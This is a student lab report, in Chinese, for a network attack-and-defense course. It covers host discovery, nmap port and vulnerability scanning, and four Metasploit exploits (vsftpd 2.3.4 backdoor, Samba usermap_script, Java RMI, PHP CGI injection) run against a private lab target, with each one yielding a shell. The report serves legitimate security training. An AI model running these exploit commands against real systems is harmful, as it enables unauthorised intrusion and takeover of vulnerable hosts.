20222404 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

前方传来浪涛呼喊声發表於2024-11-18

1.實驗內容
1.1實驗要求
掌握metasploit的用法。
(1)前期滲透
①主機發現(可用Aux中的arp_sweep,search一下就可以use)
②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③選做:也可以掃系統版本、漏洞等。
(2)Vsftpd原始碼包後門漏洞(21埠)

1.2本週學習內容
說實話印象最深的就是週五的相關測試orz……
主要學習了Metasploit工具。包括其作為模組化系統載荷模組、掃描模組、輔助模組等,也對其命令包括set\usee等進行了瞭解,並在實驗中進一步透過實踐體會。

2.實驗過程
2.1前期滲透
靶機中獲取地址:

在kali中開啟msfconsole,進行掃描搜尋。
search arp_sweep
use 0
set RHOSTS 192.168.47.0/24
run

掃描到了靶機。
nmap -p 1-2048 192.168.47.146檢視靶機開放的埠。

其中開放埠會在後續操作的攻擊過程中用到。
再使用nmap -script=vuln對靶機進行漏洞掃描。可見存在大量問題和漏洞。

21埠,有Vsftpd原始碼包後門漏洞


2.2Vsftpd原始碼包後門漏洞(21埠)
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.47.146
run
再輸入uname -a,pwd,id等命令,可以看到已經獲取靶機的shell,攻擊成功

2.3SambaMS-RPC Shell命令注入漏洞(埠139)
use exploit/multi/samba/usermap_script
set RHOST 192.168.47.146
exploit
再輸入uname -a命令,獲取靶機的shell,攻擊成功。

2.4Java RMI SERVER命令執行漏洞(1099埠)
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.47.146
exploit
shell
輸入命令whoami,得到結果root,攻擊成功。

2.5PHP CGI引數執行注入漏洞(80埠)
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.47.146
exploit
shell
可以執行命令,說明攻擊成功。

3.問題及解決方案

4.學習感悟與思考
本次實驗相較於週五的測試簡單了太多,可能是因為靶機環境是已經設定好不需要格外操作的,做週五測試時是真的痛苦,所有的靶機環境都有問題,和輸入命令入關,只能不停地除錯靶機。
總之有了對比,本次實驗較為輕鬆,也算進一步對msf進行了解和實際操作。同時結合msf和nmap對問題進行蒐集也讓人印象深刻。
本次實驗我體會到了電腦漏洞的可怕,明白了網路安全達到重要性。

相關文章